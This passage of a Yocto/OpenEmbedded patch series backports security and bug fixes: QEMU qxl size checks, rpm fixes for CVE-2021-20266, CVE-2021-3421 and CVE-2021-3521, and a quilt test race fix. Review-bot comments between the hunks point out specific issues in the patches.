++ /* Then read including the chunked data following QXLCursor. */
++ cursor = qxl_phys2virt(qxl, cmd->u.set.shape, ext->group_id,
++ sizeof(QXLCursor) + cursor->chunk.data_size);
+ if (!cursor) {
+ return 1;
+ }
+diff --git a/hw/display/qxl.c b/hw/display/qxl.c
+index 6bc8385b..858d3e93 100644
+--- a/hw/display/qxl.c
++++ b/hw/display/qxl.c
+@@ -275,7 +275,8 @@ static void qxl_spice_monitors_config_async(PCIQXLDevice *qxl, int replay)
+ QXL_IO_MONITORS_CONFIG_ASYNC));
+ }
+
+- cfg = qxl_phys2virt(qxl, qxl->guest_monitors_config, MEMSLOT_GROUP_GUEST);
++ cfg = qxl_phys2virt(qxl, qxl->guest_monitors_config, MEMSLOT_GROUP_GUEST,
++ sizeof(QXLMonitorsConfig));
+ if (cfg != NULL && cfg->count == 1) {
+ qxl->guest_primary.resized = 1;
+ qxl->guest_head0_width = cfg->heads[0].width;
+@@ -460,7 +461,8 @@ static int qxl_track_command(PCIQXLDevice *qxl, struct QXLCommandExt *ext)
+ switch (le32_to_cpu(ext->cmd.type)) {
+ case QXL_CMD_SURFACE:
+ {
+- QXLSurfaceCmd *cmd = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id);
++ QXLSurfaceCmd *cmd = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id,
++ sizeof(QXLSurfaceCmd));
+
+ if (!cmd) {
+ return 1;
+@@ -494,7 +496,8 @@ static int qxl_track_command(PCIQXLDevice *qxl, struct QXLCommandExt *ext)
+ }
+ case QXL_CMD_CURSOR:
+ {
+- QXLCursorCmd *cmd = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id);
++ QXLCursorCmd *cmd = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id,
++ sizeof(QXLCursorCmd));
+
+ if (!cmd) {
+ return 1;
+@@ -674,7 +677,8 @@ static int interface_get_command(QXLInstance *sin, struct QXLCommandExt *ext)
+ *
+ * https://cgit.freedesktop.org/spice/win32/qxl-wddm-dod/commit/?id=f6e099db39e7d0787f294d5fd0dce328b5210faa
+ */
+- void *msg = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id);
++ void *msg = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id,
++ sizeof(QXLCommandRing));
+ if (msg != NULL && (
+ msg < (void *)qxl->vga.vram_ptr ||
+ msg > ((void *)qxl->vga.vram_ptr + qxl->vga.vram_size))) {
+@@ -1494,7 +1498,8 @@ static bool qxl_get_check_slot_offset(PCIQXLDevice *qxl, QXLPHYSICAL pqxl,
+ }
+
+ /* can be also called from spice server thread context */
+-void *qxl_phys2virt(PCIQXLDevice *qxl, QXLPHYSICAL pqxl, int group_id)
++void *qxl_phys2virt(PCIQXLDevice *qxl, QXLPHYSICAL pqxl, int group_id,
++ size_t size)
+ {
+ uint64_t offset;
+ uint32_t slot;
+@@ -1994,7 +1999,7 @@ static void qxl_dirty_surfaces(PCIQXLDevice *qxl)
+ }
+
+ cmd = qxl_phys2virt(qxl, qxl->guest_surfaces.cmds[i],
+- MEMSLOT_GROUP_GUEST);
++ MEMSLOT_GROUP_GUEST, sizeof(QXLSurfaceCmd));
+ assert(cmd);
+ assert(cmd->type == QXL_SURFACE_CMD_CREATE);
+ qxl_dirty_one_surface(qxl, cmd->u.surface_create.data,
+diff --git a/hw/display/qxl.h b/hw/display/qxl.h
+index 80eb0d26..fcfd133a 100644
+--- a/hw/display/qxl.h
++++ b/hw/display/qxl.h
+@@ -147,7 +147,8 @@ typedef struct PCIQXLDevice {
+ #define QXL_DEFAULT_REVISION QXL_REVISION_STABLE_V12
+
+ /* qxl.c */
+-void *qxl_phys2virt(PCIQXLDevice *qxl, QXLPHYSICAL phys, int group_id);
++void *qxl_phys2virt(PCIQXLDevice *qxl, QXLPHYSICAL phys, int group_id,
++ size_t size);
+ void qxl_set_guest_bug(PCIQXLDevice *qxl, const char *msg, ...)
+ GCC_FMT_ATTR(2, 3);
+
+--
+2.25.1
+
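Review bot: In the `qxl_unpack_chunks()` hunk the length passed for the next chunk is `sizeof(QXLDataChunk) + chunk->data_size`, where `chunk` is still the current chunk, so the next chunk's payload is validated against its predecessor's size rather than its own. `qxl_render_cursor()` in this same patch maps the header first and then re-maps with the `data_size` it just read; the chunk walk should follow the same two-step pattern, using a local `QXLPHYSICAL next_chunk` to hold the address. Whether the size is enforced at all depends on the body of `qxl_phys2virt()`, which is outside the hunk (only its signature changes here). The loop around this call also starts and ends outside the hunk.

```c
        /* … unchanged: copy of the current chunk and the offset == size check … */
        next_chunk = chunk->next_chunk;
        /* First map only the header to learn the next chunk's data_size ... */
        chunk = qxl_phys2virt(qxl, next_chunk, group_id, sizeof(QXLDataChunk));
        if (!chunk) {
            return;
        }
        /* ... then re-map with the payload length that chunk itself declares. */
        chunk = qxl_phys2virt(qxl, next_chunk, group_id,
                              sizeof(QXLDataChunk) + chunk->data_size);
        if (!chunk) {
            return;
        }
```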
diff --git a/meta/recipes-devtools/qemu/qemu_4.2.0.bb b/meta/recipes-devtools/qemu/qemu_4.2.0.bb
index 9c76144749..05449afe4e 100644
--- a/meta/recipes-devtools/qemu/qemu_4.2.0.bb
+++ b/meta/recipes-devtools/qemu/qemu_4.2.0.bb
@@ -24,7 +24,8 @@ do_install_append_class-nativesdk() {
}
PACKAGECONFIG ??= " \
- fdt sdl kvm \
+ fdt sdl kvm slirp \
${@bb.utils.filter('DISTRO_FEATURES', 'alsa xen', d)} \
+ ${@bb.utils.filter('DISTRO_FEATURES', 'seccomp', d)} \
"
-PACKAGECONFIG_class-nativesdk ??= "fdt sdl kvm"
+PACKAGECONFIG:class-nativesdk ??= "fdt sdl kvm slirp"
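Review bot: The new `PACKAGECONFIG:class-nativesdk` line uses the colon override syntax, while the rest of this recipe, as far as the hunk shows (`do_install_append_class-nativesdk()` in the hunk header), still uses underscore overrides. If the bitbake that parses this branch does not treat `:` as an override separator, the line would either fail to parse or not take effect, and nativesdk builds would pick up the generic `PACKAGECONFIG`, which now also enables `slirp` and, by distro feature, `seccomp`. Either keep `PACKAGECONFIG_class-nativesdk ??= "fdt sdl kvm slirp"` to match the file, or convert the whole recipe in one change.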
diff --git a/meta/recipes-devtools/quilt/quilt.inc b/meta/recipes-devtools/quilt/quilt.inc
index d6d06c049c..ad23b8d922 100644
--- a/meta/recipes-devtools/quilt/quilt.inc
+++ b/meta/recipes-devtools/quilt/quilt.inc
@@ -12,6 +12,7 @@ SRC_URI = "${SAVANNAH_GNU_MIRROR}/quilt/quilt-${PV}.tar.gz \
file://Makefile \
file://test.sh \
file://0001-tests-Allow-different-output-from-mv.patch \
+ file://faildiff-order.patch \
"
SRC_URI_append_class-target = " file://gnu_patch_test_fix_target.patch"
@@ -30,7 +31,7 @@ EXTRA_OECONF = "--with-perl='${USRBINPATH}/env perl' --with-patch=patch"
EXTRA_OECONF_append_class-native = " --disable-nls"
EXTRA_AUTORECONF += "--exclude=aclocal"
-CACHED_CONFIGUREVARS += "ac_cv_path_BASH=/bin/bash"
+CACHED_CONFIGUREVARS += "ac_cv_path_BASH=/bin/bash ac_cv_path_COLUMN=column"
# Make sure we don't have "-w" in shebang lines: it breaks using
# "/usr/bin/env perl" as parser
diff --git a/meta/recipes-devtools/quilt/quilt/faildiff-order.patch b/meta/recipes-devtools/quilt/quilt/faildiff-order.patch
new file mode 100644
index 0000000000..f22065a250
--- /dev/null
+++ b/meta/recipes-devtools/quilt/quilt/faildiff-order.patch
@@ -0,0 +1,41 @@
+Upstream-Status: Backport
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+From 4dfe7f9e702c85243a71e4de267a13e434b6d6c2 Mon Sep 17 00:00:00 2001
+From: Jean Delvare <jdelvare@suse.de>
+Date: Fri, 20 Jan 2023 12:56:08 +0100
+Subject: [PATCH] test: Fix a race condition
+
+The test suite does not differentiate between stdout and stderr. When
+messages are printed to both, the order in which they will reach us
+is apparently not guaranteed. Ideally this would be deterministic, but
+until then, explicitly test stdout and stderr separately in the test
+case itself. Otherwise the test suite fails randomly, which is a pain
+for distribution package maintainers.
+
+This fixes bug #63651 reported by Ross Burton:
+https://savannah.nongnu.org/bugs/index.php?63651
+
+Signed-off-by: Jean Delvare <jdelvare@suse.de>
+---
+ test/faildiff.test | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/test/faildiff.test b/test/faildiff.test
+index 5afb8e3..0444c15 100644
+--- a/test/faildiff.test
++++ b/test/faildiff.test
+@@ -27,8 +27,9 @@ What happens on binary files?
+ > File test.bin added to patch %{P}test.diff
+
+ $ printf "\\003\\000\\001" > test.bin
+- $ quilt diff -pab --no-index
++ $ quilt diff -pab --no-index 2>/dev/null
+ >~ (Files|Binary files) a/test\.bin and b/test\.bin differ
++ $ quilt diff -pab --no-index >/dev/null
+ > Diff failed on file 'test.bin', aborting
+ $ echo %{?}
+ > 1
+--
+2.34.1
+
diff --git a/meta/recipes-devtools/rpm/files/0001-rpm-rpmio.c-restrict-virtual-memory-usage-if-limit-s.patch b/meta/recipes-devtools/rpm/files/0001-rpm-rpmio.c-restrict-virtual-memory-usage-if-limit-s.patch
index 6454785254..dc3f74fecd 100644
--- a/meta/recipes-devtools/rpm/files/0001-rpm-rpmio.c-restrict-virtual-memory-usage-if-limit-s.patch
+++ b/meta/recipes-devtools/rpm/files/0001-rpm-rpmio.c-restrict-virtual-memory-usage-if-limit-s.patch
@@ -11,36 +11,39 @@ CPU thread.
Upstream-Status: Pending [merge of multithreading patches to upstream]
Signed-off-by: Peter Bergin <peter@berginkonsult.se>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
---
- rpmio/rpmio.c | 34 ++++++++++++++++++++++++++++++++++
- 1 file changed, 34 insertions(+)
+ rpmio/rpmio.c | 36 ++++++++++++++++++++++++++++++++++++
+ 1 file changed, 36 insertions(+)
diff --git a/rpmio/rpmio.c b/rpmio/rpmio.c
index e051c98..b3c56b6 100644
--- a/rpmio/rpmio.c
+++ b/rpmio/rpmio.c
-@@ -845,6 +845,40 @@ static LZFILE *lzopen_internal(const char *mode, int fd, int xz)
+@@ -845,6 +845,42 @@ static LZFILE *lzopen_internal(const char *mode, int fd, int xz)
}
#endif
-+ struct rlimit virtual_memory;
-+ getrlimit(RLIMIT_AS, &virtual_memory);
-+ if (virtual_memory.rlim_cur != RLIM_INFINITY) {
++ struct rlimit virtual_memory = {RLIM_INFINITY , RLIM_INFINITY};
++ int status = getrlimit(RLIMIT_AS, &virtual_memory);
++ if ((status != -1) && (virtual_memory.rlim_cur != RLIM_INFINITY)) {
+ const uint64_t virtual_memlimit = virtual_memory.rlim_cur;
++ uint32_t threads_max = lzma_cputhreads();
+ const uint64_t virtual_memlimit_per_cpu_thread =
-+ virtual_memlimit / lzma_cputhreads();
-+ uint64_t memory_usage_virt;
++ virtual_memlimit / ((threads_max == 0) ? 1 : threads_max);
+ rpmlog(RPMLOG_NOTICE, "XZ: virtual memory restricted to %lu and "
+ "per CPU thread %lu\n", virtual_memlimit, virtual_memlimit_per_cpu_thread);
++ uint64_t memory_usage_virt;
+ /* keep reducing the number of compression threads until memory
+ usage falls below the limit per CPU thread*/
+ while ((memory_usage_virt = lzma_stream_encoder_mt_memusage(&mt_options)) >
+ virtual_memlimit_per_cpu_thread) {
-+ /* If number of threads goes down to zero lzma_stream_encoder will
-+ * will return UINT64_MAX. We must check here to avoid an infinite loop.
++ /* If number of threads goes down to zero or in case of any other error
++ * lzma_stream_encoder_mt_memusage will return UINT64_MAX. We must check
++ * for both the cases here to avoid an infinite loop.
+ * If we get into situation that one thread requires more virtual memory
+ * than available we set one thread, print error message and try anyway. */
-+ if (--mt_options.threads == 0) {
++ if ((--mt_options.threads == 0) || (memory_usage_virt == UINT64_MAX)) {
+ mt_options.threads = 1;
+ rpmlog(RPMLOG_WARNING,
+ "XZ: Could not adjust number of threads to get below "
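Review bot: The `rpmlog()` call kept by this revision prints `virtual_memlimit` and `virtual_memlimit_per_cpu_thread`, both `uint64_t`, with `%lu`; on targets where `unsigned long` is 32 bits that is a format/argument mismatch. Use `"%" PRIu64` for both conversions, from `<inttypes.h>` if rpmio.c does not already include it, which the hunk does not show. The surrounding `lzopen_internal()` body and the rest of the loop lie outside the hunk.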
diff --git a/meta/recipes-devtools/rpm/files/0001-rpmio-Fix-lzopen_internal-mode-parsing-when-Tn-is-us.patch b/meta/recipes-devtools/rpm/files/0001-rpmio-Fix-lzopen_internal-mode-parsing-when-Tn-is-us.patch
new file mode 100644
index 0000000000..9a5ebb9115
--- /dev/null
+++ b/meta/recipes-devtools/rpm/files/0001-rpmio-Fix-lzopen_internal-mode-parsing-when-Tn-is-us.patch
@@ -0,0 +1,34 @@
+From 405fc8998181353bd510864ca251dc233afec276 Mon Sep 17 00:00:00 2001
+From: Vitaly Chikunov <vt@altlinux.org>
+Date: Wed, 6 Jan 2021 23:43:41 +0300
+Subject: [PATCH] rpmio: Fix lzopen_internal mode parsing when 'Tn' is used
+
+When there is number after "T" (suggested number of threads or "0" for
+getncpus), lzopen_internal() mode parser would skip one byte, and when
+it's at the end of the string it would then parse undesired garbage from
+the memory, making intermittent compression failures.
+
+Fixes: 7740d1098 ("Add support for multithreaded xz compression")
+Signed-off-by: Vitaly Chikunov <vt@altlinux.org>
+
+Upstream-Status: Backport [https://github.com/rpm-software-management/rpm/commit/405fc8998181353bd510864ca251dc233afec276]
+
+---
+ rpmio/rpmio.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/rpmio/rpmio.c b/rpmio/rpmio.c
+index ed1e25140..9d32ec6d9 100644
+--- a/rpmio/rpmio.c
++++ b/rpmio/rpmio.c
+@@ -798,6 +798,7 @@ static LZFILE *lzopen_internal(const char *mode, int fd, int xz)
+ * should've processed
+ * */
+ while (isdigit(*++mode));
++ --mode;
+ }
+ #ifdef HAVE_LZMA_MT
+ else
+--
+2.25.1
+
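Review bot: The added `--mode;` in lzopen_internal has no comment, and without one it reads like an off-by-one rather than the fix. The digit loop `while (isdigit(*++mode));` leaves `mode` on the first non-digit character, and per the commit message the parser then skipped one byte, which at the end of the string meant parsing memory past the terminator. I would add `/* step back: the enclosing loop advances mode again */` above the new line. The enclosing loop is outside the hunk, so confirm the wording against it.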
diff --git a/meta/recipes-devtools/rpm/files/CVE-2021-20266.patch b/meta/recipes-devtools/rpm/files/CVE-2021-20266.patch
new file mode 100644
index 0000000000..f2fc47e321
--- /dev/null
+++ b/meta/recipes-devtools/rpm/files/CVE-2021-20266.patch
@@ -0,0 +1,109 @@
+From ebbf0f0133c498d229e94ecf2ed0b41d6e6a142a Mon Sep 17 00:00:00 2001
+From: Demi Marie Obenour <athena@invisiblethingslab.com>
+Date: Mon, 8 Feb 2021 16:05:01 -0500
+Subject: [PATCH] hdrblobInit() needs bounds checks too
+
+Users can pass untrusted data to hdrblobInit() and it must be robust
+against this.
+
+Backported from commit 8f4b3c3cab8922a2022b9e47c71f1ecf906077ef
+
+Upstream-Status: Backport [https://github.com/rpm-software-management/rpm/pull/1587/commits/9646711891df851dfbf7ef54cc171574a0914b15]
+CVE: CVE-2021-20266
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ lib/header.c | 48 +++++++++++++++++++++++++++++++-----------------
+ 1 file changed, 31 insertions(+), 17 deletions(-)
+
+diff --git a/lib/header.c b/lib/header.c
+index 5b09f8352..ad5b6dc57 100644
+--- a/lib/header.c
++++ b/lib/header.c
+@@ -11,6 +11,7 @@
+ #include "system.h"
+ #include <netdb.h>
+ #include <errno.h>
++#include <inttypes.h>
+ #include <rpm/rpmtypes.h>
+ #include <rpm/rpmstring.h>
+ #include "lib/header_internal.h"
+@@ -1890,6 +1891,25 @@ hdrblob hdrblobFree(hdrblob blob)
+ return NULL;
+ }
+
++static rpmRC hdrblobVerifyLengths(rpmTagVal regionTag, uint32_t il, uint32_t dl,
++ char **emsg) {
++ uint32_t il_max = HEADER_TAGS_MAX;
++ uint32_t dl_max = HEADER_DATA_MAX;
++ if (regionTag == RPMTAG_HEADERSIGNATURES) {
++ il_max = 32;
++ dl_max = 8192;
++ }
++ if (hdrchkRange(il_max, il)) {
++ rasprintf(emsg, _("hdr tags: BAD, no. of tags(%" PRIu32 ") out of range"), il);
++ return RPMRC_FAIL;
++ }
++ if (hdrchkRange(dl_max, dl)) {
++ rasprintf(emsg, _("hdr data: BAD, no. of bytes(%" PRIu32 ") out of range"), dl);
++ return RPMRC_FAIL;
++ }
++ return RPMRC_OK;
++}
++
+ rpmRC hdrblobRead(FD_t fd, int magic, int exact_size, rpmTagVal regionTag, hdrblob blob, char **emsg)
+ {
+ int32_t block[4];
+@@ -1902,13 +1922,6 @@ rpmRC hdrblobRead(FD_t fd, int magic, int exact_size, rpmTagVal regionTag, hdrbl
+ size_t nb;
+ rpmRC rc = RPMRC_FAIL; /* assume failure */
+ int xx;
+- int32_t il_max = HEADER_TAGS_MAX;
+- int32_t dl_max = HEADER_DATA_MAX;
+-
+- if (regionTag == RPMTAG_HEADERSIGNATURES) {
+- il_max = 32;
+- dl_max = 8192;
+- }
+
+ memset(block, 0, sizeof(block));
+ if ((xx = Freadall(fd, bs, blen)) != blen) {
+@@ -1921,15 +1934,9 @@ rpmRC hdrblobRead(FD_t fd, int magic, int exact_size, rpmTagVal regionTag, hdrbl
+ goto exit;
+ }
+ il = ntohl(block[2]);
+- if (hdrchkRange(il_max, il)) {
+- rasprintf(emsg, _("hdr tags: BAD, no. of tags(%d) out of range"), il);
+- goto exit;
+- }
+ dl = ntohl(block[3]);
+- if (hdrchkRange(dl_max, dl)) {
+- rasprintf(emsg, _("hdr data: BAD, no. of bytes(%d) out of range"), dl);
++ if (hdrblobVerifyLengths(regionTag, il, dl, emsg))
+ goto exit;
+- }
+
+ nb = (il * sizeof(struct entryInfo_s)) + dl;
+ uc = sizeof(il) + sizeof(dl) + nb;
+@@ -1973,11 +1980,18 @@ rpmRC hdrblobInit(const void *uh, size_t uc,
+ struct hdrblob_s *blob, char **emsg)
+ {
+ rpmRC rc = RPMRC_FAIL;
+-
+ memset(blob, 0, sizeof(*blob));
++ if (uc && uc < 8) {
++ rasprintf(emsg, _("hdr length: BAD"));
++ goto exit;
++ }
++
+ blob->ei = (int32_t *) uh; /* discards const */
+- blob->il = ntohl(blob->ei[0]);
+- blob->dl = ntohl(blob->ei[1]);
++ blob->il = ntohl((uint32_t)(blob->ei[0]));
++ blob->dl = ntohl((uint32_t)(blob->ei[1]));
++ if (hdrblobVerifyLengths(regionTag, blob->il, blob->dl, emsg) != RPMRC_OK)
++ goto exit;
++
+ blob->pe = (entryInfo) &(blob->ei[2]);
+ blob->pvlen = sizeof(blob->il) + sizeof(blob->dl) +
+ (blob->il * sizeof(*blob->pe)) + blob->dl;
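Review bot: In hdrblobInit the new guard `if (uc && uc < 8)` rejects a short buffer only when the caller passes a non-zero size; with `uc == 0` the code still reads `blob->ei[0]` and `blob->ei[1]` with no lower bound on the buffer. Presumably zero means "size unknown, caller vouches for the blob", but nothing in the hunk says so, and the commit message says this function must be robust against untrusted data. I would state the contract in a comment above the check, for example `/* uc == 0: size not supplied, caller guarantees at least the 8-byte il/dl prefix */`, and confirm that no caller passes 0 for data it has not already validated. Separately, hdrblobRead tests the helper as `if (hdrblobVerifyLengths(...))` while hdrblobInit compares `!= RPMRC_OK`; the explicit comparison in both places would read more clearly. Both function bodies continue outside the visible hunks.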
diff --git a/meta/recipes-devtools/rpm/files/CVE-2021-3421.patch b/meta/recipes-devtools/rpm/files/CVE-2021-3421.patch
new file mode 100644
index 0000000000..b1a05b6863
--- /dev/null
+++ b/meta/recipes-devtools/rpm/files/CVE-2021-3421.patch
@@ -0,0 +1,197 @@
+From 1e5b70cab83c95aa138107a38ecda75ff70e8985 Mon Sep 17 00:00:00 2001
+From: Minjae Kim <flowergom@gmail.com>
+Date: Thu, 24 Jun 2021 01:11:26 +0000
+Subject: [PATCH] Be much more careful about copying data from the signature
+ header
+
+Only look for known tags, and ensure correct type and size where known
+before copying over. Bump the old arbitrary 16k count limit to 16M limit
+though, it's not inconceivable that a package could have that many files.
+While at it, ensure none of these tags exist in the main header,
+which would confuse us greatly.
+
+This is optimized for backporting ease, upstream can remove redundancies
+and further improve checking later.
+
+Reported and initial patches by Demi Marie Obenour.
+
+Fixes: RhBug:1935049, RhBug:1933867, RhBug:1935035, RhBug:1934125, ...
+
+Fixes: CVE-2021-3421, CVE-2021-20271
+
+Upstream-Status: Backport [https://github.com/rpm-software-management/rpm/commit/d6a86b5e69e46cc283b1e06c92343319beb42e21]
+CVE: CVE-2021-3421
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+---
+ lib/package.c | 115 ++++++++++++++++++++++++--------------------------
+ lib/rpmtag.h | 4 ++
+ 2 files changed, 58 insertions(+), 61 deletions(-)
+
+diff --git a/lib/package.c b/lib/package.c
+index 081123d84e..7c26ea323f 100644
+--- a/lib/package.c
++++ b/lib/package.c
+@@ -20,76 +20,68 @@
+
+ #include "debug.h"
+
++struct taglate_s {
++ rpmTagVal stag;
++ rpmTagVal xtag;
++ rpm_count_t count;
++} const xlateTags[] = {
++ { RPMSIGTAG_SIZE, RPMTAG_SIGSIZE, 1 },
++ { RPMSIGTAG_PGP, RPMTAG_SIGPGP, 0 },
++ { RPMSIGTAG_MD5, RPMTAG_SIGMD5, 16 },
++ { RPMSIGTAG_GPG, RPMTAG_SIGGPG, 0 },
++ /* { RPMSIGTAG_PGP5, RPMTAG_SIGPGP5, 0 }, */ /* long obsolete, dont use */
++ { RPMSIGTAG_PAYLOADSIZE, RPMTAG_ARCHIVESIZE, 1 },
++ { RPMSIGTAG_FILESIGNATURES, RPMTAG_FILESIGNATURES, 0 },
++ { RPMSIGTAG_FILESIGNATURELENGTH, RPMTAG_FILESIGNATURELENGTH, 1 },
++ { RPMSIGTAG_SHA1, RPMTAG_SHA1HEADER, 1 },
++ { RPMSIGTAG_SHA256, RPMTAG_SHA256HEADER, 1 },
++ { RPMSIGTAG_DSA, RPMTAG_DSAHEADER, 0 },
++ { RPMSIGTAG_RSA, RPMTAG_RSAHEADER, 0 },
++ { RPMSIGTAG_LONGSIZE, RPMTAG_LONGSIGSIZE, 1 },
++ { RPMSIGTAG_LONGARCHIVESIZE, RPMTAG_LONGARCHIVESIZE, 1 },
++ { 0 }
++};
++
+ /** \ingroup header
+ * Translate and merge legacy signature tags into header.
+ * @param h header (dest)
+ * @param sigh signature header (src)
+ */
+ static
+-void headerMergeLegacySigs(Header h, Header sigh)
++rpmTagVal headerMergeLegacySigs(Header h, Header sigh, char **msg)
+ {
+- HeaderIterator hi;
++ const struct taglate_s *xl;
+ struct rpmtd_s td;
+
+- hi = headerInitIterator(sigh);
+- for (; headerNext(hi, &td); rpmtdFreeData(&td))
+- {
+- switch (td.tag) {
+- /* XXX Translate legacy signature tag values. */
+- case RPMSIGTAG_SIZE:
+- td.tag = RPMTAG_SIGSIZE;
+- break;
+- case RPMSIGTAG_PGP:
+- td.tag = RPMTAG_SIGPGP;
+- break;
+- case RPMSIGTAG_MD5:
+- td.tag = RPMTAG_SIGMD5;
+- break;
+- case RPMSIGTAG_GPG:
+- td.tag = RPMTAG_SIGGPG;
+- break;
+- case RPMSIGTAG_PGP5:
+- td.tag = RPMTAG_SIGPGP5;
+- break;
+- case RPMSIGTAG_PAYLOADSIZE:
+- td.tag = RPMTAG_ARCHIVESIZE;
+- break;
+- case RPMSIGTAG_SHA1:
+- case RPMSIGTAG_SHA256:
+- case RPMSIGTAG_DSA:
+- case RPMSIGTAG_RSA:
+- default:
+- if (!(td.tag >= HEADER_SIGBASE && td.tag < HEADER_TAGBASE))
+- continue;
+- break;
+- }
+- if (!headerIsEntry(h, td.tag)) {
+- switch (td.type) {
+- case RPM_NULL_TYPE:
+- continue;
+- break;
+- case RPM_CHAR_TYPE:
+- case RPM_INT8_TYPE:
+- case RPM_INT16_TYPE:
+- case RPM_INT32_TYPE:
+- case RPM_INT64_TYPE:
+- if (td.count != 1)
+- continue;
+- break;
+- case RPM_STRING_TYPE:
+- case RPM_BIN_TYPE:
+- if (td.count >= 16*1024)
+- continue;
+- break;
+- case RPM_STRING_ARRAY_TYPE:
+- case RPM_I18NSTRING_TYPE:
+- continue;
+- break;
+- }
+- (void) headerPut(h, &td, HEADERPUT_DEFAULT);
+- }
++ rpmtdReset(&td);
++ for (xl = xlateTags; xl->stag; xl++) {
++ /* There mustn't be one in the main header */
++ if (headerIsEntry(h, xl->xtag))
++ break;
++ if (headerGet(sigh, xl->stag, &td, HEADERGET_RAW|HEADERGET_MINMEM)) {
++ /* Translate legacy tags */
++ if (xl->stag != xl->xtag)
++ td.tag = xl->xtag;
++ /* Ensure type and tag size match expectations */
++ if (td.type != rpmTagGetTagType(td.tag))
++ break;
++ if (td.count < 1 || td.count > 16*1024*1024)
++ break;
++ if (xl->count && td.count != xl->count)
++ break;
++ if (!headerPut(h, &td, HEADERPUT_DEFAULT))
++ break;
++ rpmtdFreeData(&td);
++ }
++ }
++ rpmtdFreeData(&td);
++
++ if (xl->stag) {
++ rasprintf(msg, "invalid signature tag %s (%d)",
++ rpmTagGetName(xl->xtag), xl->xtag);
+ }
+- headerFreeIterator(hi);
++
++ return xl->stag;
+ }
+
+ /**
+@@ -337,7 +329,8 @@ rpmRC rpmReadPackageFile(rpmts ts, FD_t fd, const char * fn, Header * hdrp)
+ goto exit;
+
+ /* Append (and remap) signature tags to the metadata. */
+- headerMergeLegacySigs(h, sigh);
++ if (headerMergeLegacySigs(h, sigh,&msg))
++ goto exit;
+ applyRetrofits(h);
+
+ /* Bump reference count for return. */
+diff --git a/lib/rpmtag.h b/lib/rpmtag.h
+index 8c718b31b5..d562572c6f 100644
+--- a/lib/rpmtag.h
++++ b/lib/rpmtag.h
+@@ -65,6 +65,8 @@ typedef enum rpmTag_e {
+ RPMTAG_LONGARCHIVESIZE = RPMTAG_SIG_BASE+15, /* l */
+ /* RPMTAG_SIG_BASE+16 reserved */
+ RPMTAG_SHA256HEADER = RPMTAG_SIG_BASE+17, /* s */
++ /* RPMTAG_SIG_BASE+18 reserved for RPMSIGTAG_FILESIGNATURES */
++ /* RPMTAG_SIG_BASE+19 reserved for RPMSIGTAG_FILESIGNATURELENGTH */
+
+ RPMTAG_NAME = 1000, /* s */
+ #define RPMTAG_N RPMTAG_NAME /* s */
+@@ -422,6 +424,8 @@ typedef enum rpmSigTag_e {
+ RPMSIGTAG_LONGSIZE = RPMTAG_LONGSIGSIZE, /*!< internal Header+Payload size (64bit) in bytes. */
+ RPMSIGTAG_LONGARCHIVESIZE = RPMTAG_LONGARCHIVESIZE, /*!< internal uncompressed payload size (64bit) in bytes. */
+ RPMSIGTAG_SHA256 = RPMTAG_SHA256HEADER,
++ RPMSIGTAG_FILESIGNATURES = RPMTAG_SIG_BASE + 18,
++ RPMSIGTAG_FILESIGNATURELENGTH = RPMTAG_SIG_BASE + 19,
+ } rpmSigTag;
+
+
+--
+2.17.1
+
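Review bot: The `CVE:` trailer in this patch header names only CVE-2021-3421, while the upstream message a few lines above it says `Fixes: CVE-2021-3421, CVE-2021-20271`. Tooling that derives the patched CVEs from that trailer would still report CVE-2021-20271 as unpatched for this recipe. If the backport does cover both, the trailer should read `CVE: CVE-2021-3421 CVE-2021-20271`. In the code itself, the `xlateTags` table is declared without `static`, so it gets external linkage even though the patch only uses it from headerMergeLegacySigs; `static const struct taglate_s { ... } xlateTags[]` would keep it file-local.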
diff --git a/meta/recipes-devtools/rpm/files/CVE-2021-3521-01.patch b/meta/recipes-devtools/rpm/files/CVE-2021-3521-01.patch
new file mode 100644
index 0000000000..0882d6f310
--- /dev/null
+++ b/meta/recipes-devtools/rpm/files/CVE-2021-3521-01.patch
@@ -0,0 +1,60 @@
+From b5e8bc74b2b05aa557f663fe227b94d2bc64fbd8 Mon Sep 17 00:00:00 2001
+From: Panu Matilainen <pmatilai@redhat.com>
+Date: Thu, 30 Sep 2021 09:51:10 +0300
+Subject: [PATCH] Process MPI's from all kinds of signatures
+
+No immediate effect but needed by the following commits.
+
+Dependent patch:
+CVE: CVE-2021-3521
+Upstream-Status: Backport [https://github.com/rpm-software-management/rpm/commit/b5e8bc74b2b05aa557f663fe227b94d2bc64fbd8]
+Signed-off-by: Riyaz Khan <Riyaz.Khan@kpit.com>
+
+---
+ rpmio/rpmpgp.c | 12 +++++-------
+ 1 file changed, 5 insertions(+), 7 deletions(-)
+
+diff --git a/rpmio/rpmpgp.c b/rpmio/rpmpgp.c
+index ee5c81e246..340de5fc9a 100644
+--- a/rpmio/rpmpgp.c
++++ b/rpmio/rpmpgp.c
+@@ -511,7 +511,7 @@ pgpDigAlg pgpDigAlgFree(pgpDigAlg alg)
+ return NULL;
+ }
+
+-static int pgpPrtSigParams(pgpTag tag, uint8_t pubkey_algo, uint8_t sigtype,
++static int pgpPrtSigParams(pgpTag tag, uint8_t pubkey_algo,
+ const uint8_t *p, const uint8_t *h, size_t hlen,
+ pgpDigParams sigp)
+ {
+@@ -524,10 +524,8 @@ static int pgpPrtSigParams(pgpTag tag, uint8_t pubkey_algo, uint8_t sigtype,
+ int mpil = pgpMpiLen(p);
+ if (p + mpil > pend)
+ break;
+- if (sigtype == PGPSIGTYPE_BINARY || sigtype == PGPSIGTYPE_TEXT) {
+- if (sigalg->setmpi(sigalg, i, p))
+- break;
+- }
++ if (sigalg->setmpi(sigalg, i, p))
++ break;
+ p += mpil;
+ }
+
+@@ -600,7 +598,7 @@ static int pgpPrtSig(pgpTag tag, const uint8_t *h, size_t hlen,
+ }
+
+ p = ((uint8_t *)v) + sizeof(*v);
+- rc = pgpPrtSigParams(tag, v->pubkey_algo, v->sigtype, p, h, hlen, _digp);
